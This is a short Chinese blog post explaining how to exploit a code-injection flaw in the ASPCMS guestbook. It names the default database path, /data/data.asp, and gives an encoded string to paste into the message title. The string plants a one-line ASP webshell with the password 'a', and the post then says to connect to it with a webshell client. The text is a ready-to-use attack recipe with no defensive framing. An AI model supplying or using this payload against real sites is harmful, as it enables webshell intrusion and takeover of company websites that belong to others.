ASPCMS留言本数据库可插一句话漏洞

ASPCMS主要是信息发布系统,影响版本为asp,主要用在企业建站方面。
漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库。
数据库默认配置为asp.目录在/data/data.asp下。

利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,九成的末更改:

在留言的标题处插入:┼攠數畣整爠煥敵瑳∨≡┩愾

这样就往数据库中插入了一句话,密码为a

然后用客户端链接啦··········

此条目发表在dedecms参考分类目录。将固定链接加入收藏夹。

发表评论

邮箱地址不会被公开。 必填项已用*标注

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>